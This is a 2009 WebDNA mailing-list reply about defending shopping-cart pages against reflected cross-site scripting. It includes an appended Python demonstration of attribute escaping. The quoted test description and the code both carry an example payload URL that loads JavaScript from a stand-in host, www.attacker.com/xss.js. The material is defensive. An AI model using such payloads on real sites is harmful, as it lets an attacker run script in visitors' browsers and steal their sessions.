Re: [WebDNA] PCI Vulnerability testing

This WebDNA talk-list message is from 2009. It keeps the original formatting.
I have no idea about a server level fix. This goes to never trusting user input. I thought it should always be surrounded by [raw] and [url] to prevent this. What do others do?

Bill

On Mon, Apr 13, 2009 at 2:08 PM, Bob Minor wrote:
> What are people doing for the following type of attacks?
>
> http://www.example.com/shoppingcart.tpl?cart=""
>
> I assume you could just do a [removehtml][cart][/removehtml]
>
> I know you can do something like that at the code level but is there
> something that can be done at the server level or does the new version
> cicadae have built in protections?
>
> More info on the attack
>
>>
>> http://www.example.com/?var="%20SRC="http://www.attacker.com/xss.js">
>> This will exploit the reflected cross site scripting vulnerability shown
>> before, executing the javascript code stored on the attacker's web server as
>> if it was originating from the victim web site, www.example.com.
>> A complete test will include instantiating a variable with several attack
>> vectors (Check Fuzz vectors appendix and Encoded injection appendix).
>> Finally, analyzing answers can get complex. A simple way to do this is to
>> use code that pops up a dialog, as in our example. This typically indicates
>> that an attacker could execute arbitrary JavaScript of his choice in the
>> visitors' browsers.
>

Associated Messages, from the most recent to the oldest:

    
  1. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  2. Re: [WebDNA] PCI Vulnerability testing (Jeffrey Jones 2009)
  3. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  4. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  5. Re: [WebDNA] PCI Vulnerability testing (Jeffrey Jones 2009)
  6. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  7. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  8. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  9. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  10. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  11. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  12. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  13. Re: [WebDNA] PCI Vulnerability testing (Marc Thompson 2009)
  14. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  15. [WebDNA] PCI Vulnerability testing (Bob Minor 2009)
William DeVaul
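Added example (Python, not WebDNA, and not code from the thread): the parameter-into-attribute pattern from the quoted URL, echoed verbatim and then with attribute-context escaping, plus a parser-based check that the reflected value stays inside its attribute. SAMPLE_URL and TEMPLATE are constructed for the demonstration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed sample request, modelled on the URL quoted in the thread: the
# parameter value is meant to land inside a quoted HTML attribute.
SAMPLE_URL = 'http://www.example.com/?var="%20SRC="http://www.attacker.com/xss.js">'

# Hypothetical page fragment that echoes the parameter into an attribute.
TEMPLATE = '<input type="text" name="var" value="{value}">'

def reflected_param(url: str, name: str) -> str:
    """Decode query parameter `name` the way a server would (empty if absent)."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]

def render_unsafe(value: str) -> str:
    """Echo the value verbatim: the reflected-XSS pattern discussed above."""
    return TEMPLATE.format(value=value)

def render_safe(value: str) -> str:
    """Escape for the attribute context; quote=True also encodes " and '."""
    return TEMPLATE.format(value=html.escape(value, quote=True))

class _TagCollector(HTMLParser):
    """Collect (tag, attrs) pairs so we can inspect what a browser would see."""
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def parse_tags(rendered: str):
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return parser.tags

def reflects_intact(rendered: str, original: str) -> bool:
    """Check: exactly one tag, no attributes beyond the template's own, and the
    value attribute round-trips to the original user input."""
    tags = parse_tags(rendered)
    if len(tags) != 1:
        return False
    _, attrs = tags[0]
    return set(attrs) == {"type", "name", "value"} and attrs["value"] == original

if __name__ == "__main__":
    value = reflected_param(SAMPLE_URL, "var")
    print("unsafe intact:", reflects_intact(render_unsafe(value), value))  # False
    print("safe intact:  ", reflects_intact(render_safe(value), value))    # True
```

The unsafe rendering parses with an extra `src` attribute, which is exactly the break-out the quoted test description relies on; the escaped rendering keeps the same bytes as data inside `value`.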
